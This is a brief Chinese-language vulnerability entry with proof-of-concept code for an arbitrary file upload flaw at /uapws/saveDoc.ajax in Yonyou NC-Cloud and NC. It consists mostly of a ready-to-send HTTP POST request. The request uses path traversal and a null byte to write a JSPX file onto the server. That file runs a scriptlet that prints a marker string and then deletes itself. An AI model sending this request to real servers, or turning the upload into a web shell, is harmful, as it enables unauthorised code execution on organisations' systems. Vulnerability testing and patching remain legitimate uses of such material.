漏洞描述
用友NC-Cloud /saveDoc.ajax 路径存在任意文件上传漏洞
用友NC /saveDoc.ajax 路径存在任意文件上传漏洞
PoC代码
POST /uapws/saveDoc.ajax?ws=/../../1.jspx%00 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 283
content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
<hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
<hi:scriptlet>
out.println("asdaaa!");new java.io.File(application.getRealPath(request.getServletPath())).delete();
</hi:scriptlet>
</hi>